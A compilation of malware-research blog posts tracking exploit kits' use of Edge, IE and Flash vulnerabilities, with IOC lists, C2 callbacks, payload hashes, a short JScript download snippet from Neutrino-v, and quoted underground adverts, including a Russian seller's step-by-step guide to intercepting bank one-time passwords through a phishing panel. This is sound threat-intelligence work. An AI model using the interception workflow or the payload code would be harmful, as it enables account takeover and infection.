ificationplanet.87692f31beea22522f1488df044e1dad.top93.190.141.45Nebula2017/02/28chooseravioli.87692f31beea22522f1488df044e1dad.top93.190.141.45Nebula2017/02/28coachadvantage.reportattackconifer.site93.190.141.39Nebula2017/02/28databasesilver.reportattackconifer.site93.190.141.39Nebula2017/02/28date-of-birthtrout.87692f31beea22522f1488df044e1dad.top93.190.141.45Nebula2017/02/28dependentswhorl.jsffu2zkt5va.trade93.190.141.45Nebula2017/02/28derpenquiry.87692f31beea22522f1488df044e1dad.top93.190.141.45Nebula2017/02/28domainconsider.mxkznekruoays.trade93.190.141.200Nebula2017/03/01agesword.alvdxq1l6n0o.stream93.190.141.166Nebula2017/03/01authorparticle.390a20778a68d056c40908025df2fc4e.site93.190.141.45Nebula2017/03/01bakermagician.alvdxq1l6n0o.stream93.190.141.166Nebula2017/03/01bombclick.alvdxq1l6n0o.stream93.190.141.166Nebula2017/03/02actressheight.knowledgedrugsaturday.club93.190.141.45Nebula2017/03/02agesword.alvdxq1l6n0o.stream93.190.141.166Nebula2017/03/02applywholesaler.tboapfmsyu.stream93.190.141.200Nebula2017/03/02approvepeak.knowledgedrugsaturday.club93.190.141.45Nebula2017/03/02bakermagician.alvdxq1l6n0o.stream93.190.141.166Nebula2017/03/02bombclick.alvdxq1l6n0o.stream93.190.141.166Nebula2017/03/02borrowfield.77e1084e.pro93.190.141.45Nebula2017/03/02boydescription.356020817786fb76e9361441800132c9.win93.190.141.39Nebula2017/03/02buglecommand.textfatherfont.info93.190.141.39Nebula2017/03/02buysummer.77e1084e.pro93.190.141.45Nebula2017/03/02captaincertification.77e1084e.pro93.190.141.45Nebula2017/03/02chargerule.textfatherfont.info93.190.141.39Nebula2017/03/02cityacoustic.textfatherfont.info93.190.141.39Nebula2017/03/02clickbarber.356020817786fb76e9361441800132c9.win93.190.141.39Nebula

CVE-2016-7200 & CVE-2016-7201 are vulnerabilities in the Chakra JavaScript scripting engine in Microsoft Edge. Reported by Natalie Silvanovich of Google Project Zero, those have been fixed  in november 2016 (MS16-129) by Microsoft.Note : No successful exploitation seen despite integration tries.On 2017-01-04 @theori_io released a POCProof-of-Concept exploit for Edge bugs (CVE-2016-7200 & CVE-2016-7201) —https://t.co/DnwQt5giMB— Theori (@theori_io) 4 janvier 2017providing again (cf CVE-2016-0189) ready-to-use code to Exploit Kit maintainer.After not far from 6 months without new exploit integrated in an EK ecosystem which has lost its innovation locomotive (Angler) , the drive-by landscape is struggling to stay in shape. Low infection rate means more difficulties to properly convert bought traffic.The exploits are spotted first in Sundown, but integration in RIG/Empire/Neutrino/Magnitude/Kaixin should be a matter of hours/days.[edit : 2017-01-10]​I have been told that with Win10 1607, Microsoft Edge has some quite strong mitigation: no WinExec, no CreateProcess, no ShellExecute, meaning every child process creation is blocked. The PoC might need a little more "magic powder" to work there.[/edit]Sundown:2017-01-06Sundown EK firing CVE-2016-7200/7201 to Edge 2017-01-06No exploitation here thoughFiddler: Sundown_Edge__CVE-2016-7201_170106.zip (password is malware)Out of topic: expected payload in that infection chain was zloader. (other payload seen in past weeks dropped via Sundown : Zeus Panda, Neutrino Bot, Dreambot, Chthonic, Andromeda, Smokebot, Betabot, Remcos, IAP, RTM, Kronos, Bitcoin Miner)Neutrino:2017-01-14--Thanks to Trendmicro for the multiple inputs that allowed me to keep plugged to this infection chain.--So as explained previously Neutrino is now in full private mode and fueled via Malvertising bought to several ad agencies (e.g. ZeroPark, ClickAdu, PropellerAds, HillTopAds) by a Traffer actor which I tag as NeutrAds. Their infection chain is now accepting/redirecting Microsoft Edge Browser as well.Without big surprise a new exploit is included in the Flash bundle : nw27 >  CVE-2016-7200/7201.NeutrAds redirect is now  accepting Edge traffic - 2017-01-14Neutrino Embedding CVE-2016-7200/7201 - 2017-01-14(Neutrino-v flash ran into Maciej ‘s Neutrino decoder )Extracted CVE-2016-7200/7201  elements - 2017-01-14Note: i did not get infection with- Edge 25.10586.0.0 / EdgeHTML 13.10586- Edge 20.10240.16384.0Fiddler&Pcap : Neutrino-v_CVE-2016-72007201_170114.zip  (Password is malware)Extracted exploits: Neutrino_2017-01-14.zip (Password is malware)reveiled[.space|45.32.113.97 - NeutrAds Filtering Redirectorvfwdgpx.amentionq[.win|149.56.115.166 - Neutrino Payload in that pass : Gootkit - b5567655caabb75af68f6ea33c7a22dbc1a6006ca427da6be0066c093f592610Associated C2 :buyyou[.org | 204.44.118.228felixesedit[.comfastfuriedts[.org monobrosexeld[.orgSo those days, in Asia you'll most probably get Cerber and in EU/NA you'll most probably get GootkitMISP : taxonomy illustrating some NeutrAds into Neutrino-v recorded activity (and post infection)Kaixin:2017-01-15 Finding by Simon ChoiCVE-2016-7200/7201 code fired by Kaixin - 2017-01-16Fiddler : Kaixin_2017-01-16.zip (Password is malware)Out of topic: payload in another pass (not fired by this exploit) was Blackmoon/Banbra 6c919213b5318cdb60d67a4b4ace709dfb7e544982c0e101c8526eff067c8332Callback:http://r.pengyou[.com/fcg-bin/cgi_get_portrait.fcg?uins=1145265195http://67.198.186[.254/ca.php?m=525441744D5441744D6A63744E3055744D554D745130493D&h=437Edits:2016-11-10 - Adding information about mitigation on Edge2016-11-14 - Adding Neutrino2016-11-16 - Fixed the screenshot for Neutrino. Was stating CVE-2016-4117 was there. It's not2016-11-16 - Adding KaixinRead More:Three roads lead to Rome - Qihoo360 - 2016-11-29Proof-of-Concept exploit for Edge bugs (CVE-2016-7200 & CVE-2016-7201) - Theori-io - 2017-01-04

  Around the middle of August many infection chains transitioned to RIG with more geo-focused bankers and less CryptXXX (CryptMic) Ransomware. Picture 1: Select Drive-by landscape - Middle of August 2016 vs Middle of July 2016RIG += internal TDS :Trying to understand that move, I suspected and confirmed the presence of an internal TDS (Traffic Distribution System) inside RIG Exploit Kit [Edit 2016-10-08 : It seems this functionality is limited to Empire Pack version of RIG]I believe this feature appeared in the EK market with Blackhole (if you are aware of a TDS integrated earlier directly in an EK please tell me) Picture2: Blackhole - 2012 - Internal TDS illustrationbut disappeared from the market with the end of Nuclear Pack Picture3: Nuclear Pack - 2016-03-09 - Internal TDS illustrationand Angler EK Picture 4 : Angler EK - Internal TDS illustrationThis is a key feature for load seller. It is making their day to day work with traffic provider far easier . It allows Exploit Kit operator to attach multiple payloads to a unique thread. The drop will be conditioned by Geo (and/or OS settings) of the victim.Obviously you can achieve the same result with any other exploit kit…but things are a little more difficult. You have to create one Exploit Kit thread per payload, use an external TDS (like Keitaro/Sutra/BlackHat TDS/SimpleTDS/BossTDS, etc…) and from that TDS, point the traffic to the correct Exploit Kit thread (or, if you buy traffic, tell your traffic provider where to send traffic for each targeted country). Picture 5: A Sutra TDS in action in 2012 - cf The path to infection RIG += RC4 encryption, dll drop and CVE-2016-0189:Around 2016-09-12 a variation of RIG (which i flag as RIG-v in my systems) appeared.A slightly different landing obfuscation, RC4 encoding, Neutrino-ish behavioral and added CVE-2016-0189 Picture 6: RIG-v Neutrino-ish behavioral captured by Brad Spengler’s modified cuckoo Picture 7: CVE-2016-0189 from RIG-v after 3 step de-obfuscation pass.Neutrino waves goodbye ?On 2016-09-09 on underground it has been reported a message on Jabber from the Neutrino seller account :“we are closed. no new rents, no extends more”This explains a lot. Here are some of my last Neutrino pass for past month. Picture 8: Some Neutrino passes for past month and associated taxonomy tags in MispAs you can see several actors were still using it…Now here is what i get for the past days : Picture 9: Past days in DriveBy land Not shown here, Magnitude is still around, mostly striking in AsiaDay after day, each of them transitioned to RIG or “RIG-v”. Around the 22nd of September 2016 the Neutrino advert and banner disappeared from underground. Picture 10: Last banner for Neutrino as of 2016-09-16Are we witnessing the end of Neutrino Exploit Kit ? To some degree. In fact it looks more like Neutrino is going in full “Private” mode “a la” Magnitude.Side reminder : Neutrino disappeared from march 2014 till november 2014A Neutrino VariantSeveral weeks ago, Trendmicro (Thanks!!) made me aware of a malvertising chain they spotted in Korea and Taiwan involving Neutrino. Picture 11: Neutrino-v pass on the 2016-09-21Upon replay I noticed that this Neutrino was somewhat different. Smoother CVE-2016-4117, more randomization in the landing, slightly modified flash bundle of exploits Picture 12: Neutrino-v flash ran into Maciej ‘s Neutrino decoder Note the pnw26 with no associated binary data, the rubbish and additionalInfoA Sample : 607f6c3795f6e0dedaa93a2df73e7e1192dcc7d73992cff337b895da3cba5523 Picture 13: Neutrino-v behavioral is a little different : drops name are not generated via the GetTempName api function k2(k) { var y = a(e + "." + e + "Request.5.1"); y.setProxy(n); y.open("GET", k(1), n); y.Option(n) = k(2); y.send(); if (200 == y.status) return Rf(y.responseText, k(n)) };Neutrino-v ensuring Wscript will use the default proxy (most often when a proxy is configured it’s only for WinINet , WinHTTP proxy is not set and Wscript will try to connect directly and fail)I believe this Neutrino variant is in action in only one infection chain (If you think this is inaccurate, i’d love to hear about it) Picture 14: Neutrino-v seems to be used by only one actor to spread Cerber 0079xThe actor behind this chain is the same as the one featured in the Malwarebytes Neutrino EK: more Flash trickery post.Empire Pack:Coincidentally a new Exploit Kit is being talked about underground : Empire Pack. Private, not advertised. Picture 15: King of Loads - Empire Pack PanelSome might feel this interface quite familiar…A look a the favicon will give you a hint Picture 16: RIG EK favicon on Empire Pack panel Picture 17: RIG PanelIt seems Empire Pack project was thought upon Angler EK disappearance and launched around the 14th of August 2016.[Speculation] I think this launch could be related to the first wave of switch to RIG that occurred around that time. I think, Empire Pack is a RIG instance managed by a Reseller/Load Seller with strong underground connections. [/Speculation]RIG-v is a “vip” version of RIG. Now how exactly those three elements (RIG, RIG-v, Empire Pack) are overlapping, I don’t know. I am aware of 3 variants of the API to RIGapi.php : historical RIG api3.php : RIG with internal TDS [ 2016-10-08 :  This is Empire Pack. Appears to be using also remote_api after this post went live. I flag it as RIG-E ]remote_api.php : RIG-vBut Empire Pack might be api3, remote_api, or a bit of both of them.By the way RIG has also (as Nuclear and Angler endup doing) added IP Whitelisting on API calls to avoid easy EK tracking from there.   :-" (Only whitelisted IP - from declared redirector or external TDS - can query the API to get the current landing) ConclusionLet’s just conclude this post with statistics pages of two Neutrino threads Picture 18: Neutrino stats - Aus focused thread - 2016-07-15Picture 19: Neutrino stats on 1 Million traffic - 2016-06-09“We will be known forever by the tracks we leave”Santee Sioux TribeSome IOCsDateDomainIPComment2016-10-01szsiul.bluekill[.]top137.74.55.6Neutrino-v2016-10-01twqivrisa.pinkargue[.]top137.74.55.7Neutrino-v2016-10-01u0e1.wzpub4q7q[.]top185.117.73.80RIG-E (Empire Pack)2016-10-01adspixel[.]site45.63.100.224NeutrAds Redirector2016-09-30re.flighteducationfinancecompany[.]com109.234.37.218RIG-v2016-09-28add.alislameyah[.]org193.124.117.13RIG-v2016-09-28lovesdeals[.]ml198.199.124.116RIG-v2016-09-27dns.helicopterdog[.]com195.133.201.23RIG2016-09-26sv.flickscoop[.]net195.133.201.41RIG2016-09-26red.truewestcarpetcare[.]com195.133.201.11RIG-v2016-09-26oitutn.yellowcarry[.]top78.46.167.130NeutrinoAcknowledgementsThanks Malc0de, Joseph C Chen (Trendmicro), Will Metcalf ( EmergingThreat/Proofpoint) for their inputs and help on multiple aspect of this post.Edits2016-10-03 :Removed limitation to KOR and TWN for Neutrino-v use by NeutrAds as Trendmicro informed me they are now seeing them in other Geos.Added explanation about the IP whitelisting on RIG API (it was not clear)2016-10-08 :Updated with gained information on Empire Pack2016-11-01 :RIG standard is now also using the pattern introduces past week by RIG-v. It's now in version 4.https://twitter.com/kafeine/status/790482708870864896RIG panelThe only instance of RIG using old pattern is Empire Pack (which previously could be guessed by domains pattern)2016-11-18 : Empire (RIG-E) is now using RC4 encoding as well. (still on old pattern and landing)RIG-E Behavioral2016-12-03RIG-v has increased filtering on IP ranges and added a pre-landing to filter out non IE traffic.2016-12-03 RIG-v Pre-landingRead MoreRIG’s Facelift - 2016-09-30 - SpiderLabs Is it the End of Angler ? - 2016-06-11 Neutrino : The come back ! (or Job314 the Alter EK) - 2014-11-01 Hello Neutrino ! - 2013-06-07The path to infection - Eye glance at the first line of “Russian Underground” - 2012-12-05

Gift for SweetTail-Fox-mlp by Mad-N-MonstrousSmall data drop about another Pony fork : Fox stealer.First sample of this malware I saw was at beginning of September 2016 thanks to Malc0de. After figuring out the panel name and to which advert it was tied we were referring to it as PonyForx.Advert :2016-08-11 - Sold underground by a user going with nickname "Cronbot"--------Стилер паролей и нетолько - Fox v1.0Мы выпускаем продукт на продажу. Уже проходит финальная стадия тестирования данного продукта.О продукте : 1. Умеет все что умеет пони. + добавлен новый софт.2. Актуален на 2016 год.3. Написан на С++ без дополнительных библиотек.4. Админка от пони.Условия : 1. Только аренда.2. Распространяется в виде EXE и DLL.3. Исходники продавать не будем.Аренда 250$ в месяц.Исходники 2000$ разово.----Translated by Jack Urban : ----Password stealer and more - Fox v.1.0We are releasing the product for general sale. Final stage of testing for this product is already underway.About the product:1. Is able to do everything that pony does. + new software has been added.2. Relevant for 2016.3. Written in C++ without additional libraries.4. Admin from pony.Conditions:1. For rent only.2. Distributed as an EXE and DLL.3. We will not be selling the source.Rent is $250 a month.Originals are a 2000$ one time fee. --------It's being loaded (with Locky Affid 13) by the Godzilla from ScriptJS (aka AfraidGate) group .MISP taxonomy tags reflecting ScriptJS activity in the last months(note : it's not the first time this group is pushing a stealer, they were dropping Pony with their Necurs between August and December 2015 [1] )2016-09-26 - ScriptJS infection chain into Neutrino into Godzilla loader into PonyForx and Locky Affid 13Here we can see the browsing history of the VM being sent to PonyForx (Fox stealer) C2Fox stealer (PonyForx) fingerprint in CuckooSample :cca1f8ba0be872ec86755e3defbb23c8fe4a272a6b4f7ec651302c5cddc5e183Associated C2:blognetoo[.]com/find.php/helloblognetoo[.]com/find.php/datablognetoo[.]com|104.36.83.52blognetoo[.]com|45.59.114.126Caught by ET rule :2821590 || ETPRO TROJAN Win32.Pony Variant Checkin[1] ScriptJS's Pony :master.districtpomade[.]com|188.166.54.203 - 2015-08-15 Pony C2 from ScriptJS​js.travelany[.]com[.]ve|185.80.53.18 - 2015-12-10 Pony C2 from ScriptJSRead More : http://pastebin.com/raw/uKLhTbLs few bits about ScriptJSInside Pony 1.7 / Fareit C&C - Botnet Control Panel - 2012-06-27Pony 1.9 (Win32/Fareit) - 2013-05-23 - Xylitol

Spotted by Symantec in the wild  patched with MS16-051 in may 2016, CVE-2016-0189 is now being integrated in Exploit Kit.Neutrino Exploit Kit :Here 2016-07-13 but i am being told that i am late to the party.It's already [CN] documented hereNeutrino after ScriptJS redirector dropping Locky Affid 13- 2016-07-13Flash sample in that pass : 85b707cf63abc0f8cfe027153031e853fe452ed02034b792323eecd3bc0f7fd(Out of topic payload : 300a51b8f6ad362b3e32a5d6afd2759a910f1b6608a5565ddee0cad4e249ce18 - Locky Affid 13 ) Thanks to Malc0de for invaluable help here :)Files Here: Neutrino_CVE-2016-0189_160714 (Password is malware - VT Link)Sundown :Some evidence of CVE-2016-0189 being integrated in Sundown were spotted on jul 15 by @criznashOn the 16th I recorded a pass where the CVE-2016-0189 had his own calls :Sundown exploiting CVE-2016-0189 to drop Smokebot on the 2016-07-16(Out of topic payload :  61f9a4270c9deed0be5e0ff3b988d35cdb7f9054bc619d0dc1a65f7de812a3a1 beaconing to : vicolavicolom.com | 185.93.185.224 )Files : Sundown_CVE-2016-0189_160716 (password is malware)RIG:I saw it on 2016-09-12 but might have appeared before.RIG successfully exploiting CVE-2016-0189 - 2016-09-12CVE-2016-0189 from RIG after 3 step decoding passFiles : RIG_2016-0189_2016-09-12 (password is malware)Magnitude:Here pass from 2016-09-16 but is inside since at least 2016-09-04 (Source : Trendmicro - Thanks)CVE-2016-0189 in Magnitude on 2016-09-16Sorry i can't share fiddler publicly in that case (Those specific one would give to attack side too much information about some of the technics that can be used - You know how to contact me)Out of topic Payload:  Cerbera0d9ad48459933348fc301d8479580f85298ca5e9933bd20e051b81371942b2cGrandSoft:Spotted first on 2017-09-22 here is traffic from 2018-01-30 on : Win10 Build 10240 - IE11.0.10240.16431 - KB3078071CVE-2016-0189 in GrandSoft on 2018-01-30Out of topic Payload:  GandCrab Ransomwarea15c48c74a47e81c1c8b26073be58c64f7ff58717694d60b0b5498274e5d9243Fiddler here : GrandSoft_WorkingonIE11_Win10d.zip (pass is malware) Edits :2016-07-15 a previous version was stating CVE-2015-5122 for nw23. Fixed thanks to @dnpushme2016-07-20 Adding Sundown.2016-09-17 Adding RIG2016-09-19 Adding Magnitude2018-01-30 Adding GrandSoft (but appeared there on 2017-09-22)Read More :[CN] NeutrinoEK来袭：爱拍网遭敲诈者病毒挂马 2016-07-14 - Qihoo360Patch Analysis of CVE-2016-0189 - 2016-06-22 - TheoriInternet Explorer zero-day exploit used in targeted attacks in South Korea - 2016-05-10 - SymantecNeutrino EK: fingerprinting in a Flash - 2016-06-28 - MalwarebytesPost publication Reading :Exploit Kits Quickly Adopt Exploit Thanks to Open Source Release - 2016-07-14 - FireEye

Everyone looking at the DriveBy landscape is seeing the same : as Nuclear disappeared around April 30th,  Angler EK has totally vanished on June 7th. We were first thinking about Vacation as in January 2016 or maybe Infrastructure move. But something else is going on.---On the Week-End of the 4-5th of June I noticed that the ongoing malvertising from SadClowns was redirecting to Neutrino Exploit Kit (dropping Cerber)EngageBDR malvertising redirecting to SadClowns infra pushing traffic to Neutrino to Drop Cerber RansomwareOn the 6th I noticed several group migrating to RIG, Neutrino or even Sundown.But I got speechless when I noticed that GooNky had switched to Neutrino to spread their CryptXXX U000001 and U000006.They were sticking exclusively to Angler EK since years and their vacation were synchronized with Angler's in January.Checking all known to me infection path I could hardly find some Angler....last one were behind the EItest infection chain on the night of the 6th to 7th of June.Last Angler pass I captured on 2016-06-07EITest into Angler dropping CryptXXX 3.200 U000017On June 7th around 5:30 AM GMT my tracker recorded its last Angler hit :Last Hit in my Angler tracker.After that...RIG, Neutrino instead of Angler almost everywhere.[Side note: Magnitude is still around...But as mentioned earlier it's a One Actor operation since some time]Aside SadClowns and GooNky here are two other big (cf traffic volume) group which transition has not been covered already"WordsJS"  (named NTL/NTLR by RiskIQ) into Neutrino > CryptXXX U0000102016-06-10"ScriptJS" (Named DoublePar by RiskIQ and AfraidGate by PaloAlto) into Neutrino > CryptXXX U000011This gang  was historically dropping Necurs, then Locky Affid13 before going to CryptXXXIllustrating with a picture of words and some arrows:MISP : select documented EK pass with associated tags.1 arrow where you would have find Angler several days before.(+ SadClowns + GooNky not featured in that selection)With the recent 50 arrests tied to Lurk in mind and knowing the infection vector for Lurk was the "Indexm" variant of Angler between 2012 and beginning of 2016...we might think there is a connection and that some actors are stepping back.Another hint that this is probably not vacation "only" for Angler is that Neutrino changed its conditions on June 9th. From 880$ per week on shared server and 3.5k$ per month on dedicated, Neutrino doubled the price to 7k$ on dedicated only (no more per week work). Such move were seen in reaction to Blackhole's coder (Paunch) arrest in October 2013.So is this the End of Angler ? The pages to be written will tell us.“If a book is well written, I always find it too short.” ― Jane Austen, Sense and SensibilityPost publication notes:[2016-06-12]RIG : mentioned they were sill alive and would not change their Price.Maybe unrelated to RIG mention, Neutrino updated his thread as announced previously on underground but conditions are revisited :------Google translate:-----Tarif week on a shared server:Rent: $ 1500Limit: 100k hosts per dayOne-time daily discharge limits: $ 200Rate per month on a dedicated server:Rent: $ 4000Limits: 500k hosts per day, and more - on an individual basis.One-time daily discharge limits: $ 200----------------So now only price per week is doubled and month rate + ~20%[2016-06-13]Our exploit kit stats for the last two weeks… Angler dives, Neutrino soars. pic.twitter.com/RcYAH6tVck— News from the Lab (@FSLabs) June 13, 2016Acknowledgement:Thanks to Will Metcalf (Emerging Threats/Proofpoint) who made the replay of SadClowns' malvertising possible. Thanks to EKWatcher and Malc0de for their help on several points.Read More :XXX is Angler EK - 2015-12-21Russian hacker gang arrested over $25m theft - 2016-06-02 - BBC NewsNeutrino EK and CryptXXX - 2016-06-08 - ISCSansLurk Banker Trojan: Exclusively for Russia - 2016-06-10 - Securelist - KasperskyHow we helped to catch one of the most dangerous gangs of financial cybercriminals - 2016-08-30 - SecureList

Discovered being exploited in the wild by FireEye [1] on May 8, 2016, patched 4 days later with Flash 21.0.0.242, CVE-2016-4117 is making its way to Exploit Kits.Magnitude :CVE confirmed by FireEye - Thanks !On 2016-05-21 Magnitude is firing an exploit to Flash up to 21.0.0.213.Magnitude firing exploit to Flash 21.0.0.213 - 2016-05-21For now i did not get exploitation in the different pass i tried but in the Flash exploit we can see some quite explicit imports : import com.adobe.tvsdk.mediacore.timeline.operations.DeleteRangeTimelineOperation;Magnitude Flash Exploit showing import of the DeleteRangeTimelineOperationSpotted sample :  f5cea58952ff30e9bd2a935f5843d15952b4cf85cdd1ad5d01c8de2000c48b0aFiddler sent here.Updates to come as it appears to be a work in progress.Neutrino :2016-05-23Spotted by Eset.2016-05-23 Neutrino successfully exploit CVE-2016-4117 on Flash 21.0.0.213 and drop here CryptXXXSample in that pass : 30984accbf40f0920675f6ba0b6daf2a3b6d32c751fd6d673bddead2413170e8Fiddler sent here (Password is malware)Out of topic payload: 110891e2b7b992e238d4afbaa31e165a6e9c25de2aed442574d3993734fb5220 CryptXXXAngler EK:2016-05-23CVE identification by Henri Nurmi from F-Secure. Thanks !Angler EK successfully exploit Flash 21.0.0.213 on 2016-05-23 dropping DridexSample in that pass : 310528e97a26f3fee05baea69230f8b619481ac53c2325da90345ae7713dcee2Fiddler sent hereOut of topic payload  : 99a6f5674b738591588416390f22dedd8dac9cf5aa14d0959208b0087b718902Most likely Dridex 123 targeting Germany based on distribution path.Sundown :  [3]2016-08-27Sample in that pass : cf6be39135d8663be5241229e0f6651f9195a7434202067616ae00712a4e34e6 Fiddler sent here  (password : malware)Read More:[1] CVE-2016-4117: Flash Zero-Day Exploited in the Wild - 2016-05-13 - Genwei Jiang - FireEye[2] New Flash Vulnerability CVE-2016-4117 Shares Similarities With Older Pawn Storm Exploit - 2016-05-13 - Moony Li - TrendMicro[3] Sundown EK – Stealing Its Way to the Top - 2016-09-02 - Spiderlabs

Fallout Vault Boy maskThe goal of the post is to open-source data on a kit that has been seen live impersonating bank portal. This is mostly Raw data, few part only will be "google translated".On September 2015 the 16th,  an advert about a multipurpose kit appeared underground :------------------------------------------By: [Redacted]Subject : Инжекты | Админки | Фейки, -50% от рыночных цен -Доброе время суток всем.Рад предоставить свои услуги по разработке следующих проектов:Инжекты;Grabers 80-150$*;Pasive ATS 500-800$*;Active ATS 800-1500$*;Tooken Panels 400-800$*;Replacers 200-400$*;И многое другое...Фейки;Простые клоны 70-150$*;Продвинутые с перехватом 200-500$*;Админки на пхп;Под любые нужды ...*данные цены служат ориентиром. Реальная цена будет зависеть от каждого техзадания индивидуальноJabber( [Redacted]@exploit.im )ICQ( 6[Redacted]8 )------------------------------------------Google Translated as :------------------------------------------By: [Redacted]Subject: Inject | admin area | Fakes, -50% of the market price -Good time of day to all.I am glad to provide services for the development of the following projects:Inject;Grabers 80-150 $ *;Pasive ATS 500-800 $ *;Active ATS 800-1500 $ *;Tooken Panels 400-800 $ *;Replacers 200-400 $ *;And much more...fakes;Simple clones 70-150 $ *;Advanced interception $ 200-500 *;Admin Center on php;Under any needs ...* These prices are a guide. The actual price will depend on each individual ToRsJabber ([Redacted] @ exploit.im)ICQ (6[Redacted]8)------------------------------------------NB : The Subject became later :--Инжекты | Админки | Фейки | Android Инжекты, -50% от рыночных цен --Inject | admin area | fakes | Inject Android, 50% of the market price ---Seller later added :------------------------------------------Последее время очень мнoго вопросов по поводу как работает перехват на скам странице. Решил детально описать процес чтобы изначально не вводить клиентов в заблуждение.В самом начале надо понять что такое "СКАМ СТАНИЦА"."СКАМ СТРАНИЦА"- это копия реальной странички логина в банк ,которая находится на нашем сервере с похожем на банк доменом. Все детали вводимые на ней будут лететь к нам.Далее уже на выбор, или дание идут на емайл, или на специально сделанную админку.Тоесть суть замута такова:жертва попадает на нашу страницу ->вводит данные->потом наша страница кидает жертву обратно на оригинал ->и мы поже ипользуем данные сами чтобы войти..| Это самый примитивный пример , на самом деле все чуток сложнее и зависит от фантазии заказа .Дальше надо понять что такое "ПЕРЕХВАТ"."ПЕРЕХВАТ" - eто вид обмана, очень часто ипользуетса в инжектах. Само название говорит за себя.Инжект перехватывает дание в рельном времени и присылает нам . В это время жертва как обычно ждет с гиф на экране,а вы заходите вместо него.| Зачем это надо?Затем что если для перевода вам требуется дополнительно второй пароль/смс/тукен то можно это запросить ,пока жертва ждёт, через специально сделанные команды в админке.Основной бенефит что это можно делать повторно ,много раз.|| Перехват на скам страничке работать точно также . Жертвa вводить дание и ждет пока мы его спросим то что нам надо.|Поэтапно:Преставим себе что есть банк где на вход надо UserName и Password . На активацию перевода по IBAN надо нoмер с тукен-прибора (Pin1) и для переводa надо ввести номер в тукен-прибор и тукен-прибор даст нам номер обратно (Pin2)Теперь преставим себе что у нас есть скам странница на этот банк , которая будет отсылать нам получение даные для входа и потом покажет заставку жертве с просьбой подождать. Мы находимся на другом конце в админке и наблюдаем такую катину .Краткое пособие по админке."I'am Online"- показывает находится ли оператор в админке , если "Off-line" то все жертвы будут перенаправлены обратно на оригинал страницу.Колонка "Keys" это есть полученные детали для входа.Колонка "Pin" это для получених тукенов/пинов .Колонка "Task" для добавленья операции по запросу тукена/пинов .Колонка "Redirect" показывает релле редиректа конкретной жертвы . Если поставить "On" то жертва будет перенапрвлена на оригинал сразу.| *Если жертва мегает красним то это значит что жертва какраз ждет от вас комадуИ так , на даном этапе у нас есть логины для входа , и ждущий человвек на нашей странице .Входим, идем на активацию IBAN . Там нас спрашивает Pin1/Tooken1 .Мы идем обратно на админку и нажимаем запрос операции. У нас откроется окно с выбором операций .Нажимаем на "ask Pin1" и жертва видит вот это:Дальше все просто. Жертва вводить "pin1" и он приходит к нам на админку . А жертва в это время снова видит пред собой заставку "подождите" .Если пин подошол, идем на перевод и такимже способом просим "pin2". Важно понимать что это все можно повторять много раз и после неверного пина можно снова его запросить .Если залив ушол , ставим "Redirect" на "On" и юсер уходит на оригинал. Или в продвинутых системах можно показать ему техроботы и попросить зайти попоже.Вот и все!**Все тексты на английском по админке написаны с ошибками , я это знаю ).Делал очень быстро . Никак не дойдут руки сделать до конца ------------------------------------------On march 2016 the 9th :------------------------------------------доброе время суток всем.С великой радостью рад предложить свои услуги по разработке инжектов под мобильные устройства для многих публичных андроид ботов .Цены зависят от тех заданий .Пример роботы на один из UK линков можно посмотреть тут [REDACTED]pass:demoWith great joy, I am pleased to offer its services on developing injects for mobile devices for many public android bots.The prices depend on those jobs.An example of one of the injects on the UK link can be found here [REDACTED]pass:demo------------------------------------------Files mirrored here. (pass: demo)On march 2016 the 16th:------------------------------------------Ladie's and Gentlemen's.Don't miss out some fresh and well-designed mobile injects for UK.9 common links.Hight % success task.------------------------------------------On march 2016 the 31st:------------------------------------------Доброе время суток всем.Последним временем много клиентов задают одни и те же вопросы связаны с видео o работе перехвата на Нидерланды.Я решил более детально описать систему работы и поставить ее где-то в общедоступном месте.Прежде всего пару строчек хотел бы написать o админ панели. Oна называется Universal Admin. называется она не просто так Универсал,у нее реализована возможность поддерживать много разных проектов таких как: Tooken intercept,Text manager,Log parser,Drop manager и многое другое.[2 images here...not available at dump time]Не обращайте внимания на разные цвета и стили на Скринах ,стили меняются тоже прямо с админки.[1 image here...not available at dump time]Tо есть админ панель одна а плагинов под нее может быть много.Hа видео Вы видели эту админку с плагином Tooken intercept + Text manager.Text manager-это менеджер текстовых блоков и название кнопок, которые будут автоматически вставляется в вашы страницы,инжекты и фишинг сраницы.[1 images here...not available at dump time]Все что надо сделать для работы это создать текстовый блок с определенным ID ,потом на вашей странице создать элемент с этим же ID ивставить одну функцию в конец документа.Для примера: У вас есть инжект в котором есть определенная Легенда запроса дополнительной информации.Чтобы изменить эту Легенду вам как минимум надо разбираться в HTML и как максимум пересобирать конфигурацию бота.С помощью текстового менеджера в моей админке все что вам надо это поменять текст в определенном блоке и нажать сохранить.Tooken intercept- это собственно то о чем мы будем сейчас говорить.Не важно каким способом Вы стараетесь обмануть жертву (Injec ,phishing page) цель является добытие определенного пакета информации .Для примера скажем у вас есть Paypal Phishing page с помощью которой вы добывайте username и пароль. эти данные отсылаются куда-то наадминку в нашем случае это Universal Admin.Username и пароль это и есть тот самый пакет информации который после отправки формы сохраняются у вас ,а кокретно вот тут[1 image here...not available at dump time]Использовать эту информацию можно по-разному в зависимости от вашего проекта.Одним из методов использования этой информации является перехват(intercept) ,то есть использовать информацию в реальном времени прямо сейчас.Вы перехватили username и пароль и вместо жертвы попадаете на ак ,пока жертва ждет думая что страница грузится.В случае с PayPal использования перехвата не совсем обязательно, так как полученные пакет информации а именно username и пароль Выможете использовать и через неделю. Но в связи с тем что последнее время много контор используют One Time password(Tooken),которые действительны только 30 секунд, обойтись без Tooken interstep нереально. Tooken intercept дает вам возможность использовать тот самый пароль(tooken) на протяжении 30 секунд пока жертва ждет загрузки следующей страницы. Возьмем тот же PayPal. Скажем вы получили только что username и пароль, зашли внутрь, и на главной странице вам выскочила рамочка гдеговорится что для подтверждения вашей личности на ваш мобильный телефон был отправлен SMS с коротким кодом(Tooken) код который надо вести тam же в рамочкe.Код который был отправлен на мобильный телефон жертвы!!! жертва которая на данный момент находится на вашей странице(Phishing Inject)!!!там где только что она(жертва) ввела username и пароль, username и пароль те что пришли к вам на админку и те что вы использовали для тогочтобы зайти на тот самый аккаунт где вам выскочила рамочка!! В стандартных методах это называется запал и етот пакет информации можно выбросить. можно сделать такую же рамочку после логин этападля всех юзеров на нашей пишем фишинг или инжекте, но проблема в том что это рамочка показывается не всем и не всегда и если жертвена телефон ничего не приходило то он туда ничего никогда не ведет.Я думаю всем понятно что здесь нужна динамическая страница с дистанционным управлением. То есть вы должны принимать решения показыватьрамочку данной жертве или не показывать.Именно это и есть основа.Страница которая присоединена к нашей админке может меняться исходя из команд которые вы задаете 